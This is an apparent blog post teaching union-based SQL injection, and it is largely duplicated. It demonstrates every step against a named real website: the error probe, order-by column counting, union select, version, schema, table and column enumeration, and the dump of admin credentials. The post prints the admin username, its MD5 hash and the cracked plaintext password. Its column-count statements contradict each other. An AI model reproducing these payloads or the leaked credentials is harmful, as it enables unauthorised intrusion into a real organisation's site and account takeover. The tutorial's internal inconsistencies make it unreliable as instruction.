Hello , today I will show you how much SQL i Can be Easy : )
Introduction :
What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use that dorks with a SQLi Scanner , Or Google then check every site by your self .
now to check manually is a site is SQLi vuln , just add ' at the end of the url :
For example , we have our target ,
now , we want to check if the is SQLi vuln , so we add ' at the end :
if we got an error , that means that he is Vuln : )
So , now we move to next Step .
How To Find Columns Count :
after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .
For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :
![[Image: 1301868114-2.JPG]](http://www.play-files.net/images/1301868114-2.JPG)
So , in our target server , we have tryed this :
http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column
that means that the 5th column does not exist , that means that column count is 7 : D
How to Find The Acsessable Columns :
Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :
that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .
How To Get MySQL DB Version :
we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"
for example :
![[Image: 1301869123-4.JPG]](http://www.play-files.net/images/1301869123-4.JPG)
that means that we can continue working on this site .
How To Find Database Name :
Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :
![[Image: 1301869671-5.JPG]](http://www.play-files.net/images/1301869671-5.JPG)
now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :
![[Image: 1301869885-6.JPG]](http://www.play-files.net/images/1301869885-6.JPG)
Congratz , you got the used DB : D .
How to Get The Table Names :
Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .
![[Image: 1301870439-7.JPG]](http://www.play-files.net/images/1301870439-7.JPG)
How To Get Column Names :
To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example :
![[Image: 1301870776-8.JPG]](http://www.play-files.net/images/1301870776-8.JPG)
How To Get Informations From Columns :
Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :
So our exploit will be like this :
![[Image: 1301871581-9.JPG]](http://www.play-files.net/images/1301871581-9.JPG)
now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )
![[Image: 1301871757-10.JPG]](http://www.play-files.net/images/1301871757-10.JPG)
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
We have successfully injected a website , and got the admin info
Introduction :
What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use that dorks with a SQLi Scanner , Or Google then check every site by your self .
now to check manually is a site is SQLi vuln , just add ' at the end of the url :
For example , we have our target ,
Quote:http://www.cocobod.gh/news_details.php?id=30
now , we want to check if the is SQLi vuln , so we add ' at the end :
Quote:http://www.cocobod.gh/news_details.php?id=30'
if we got an error , that means that he is Vuln : )
So , now we move to next Step .
How To Find Columns Count :
after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .
For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :
So , in our target server , we have tryed this :
Quote:http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column
that means that the 5th column does not exist , that means that column count is 7 : D
How to Find The Acsessable Columns :
Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .
How To Get MySQL DB Version :
we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"
for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
that means that we can continue working on this site .
How To Find Database Name :
Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congratz , you got the used DB : D .
How to Get The Table Names :
Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
How To Get Column Names :
To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
How To Get Informations From Columns :
Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :
Quote:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
So our exploit will be like this :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
We have successfully injected a website , and got the admin info
No comments:
Post a Comment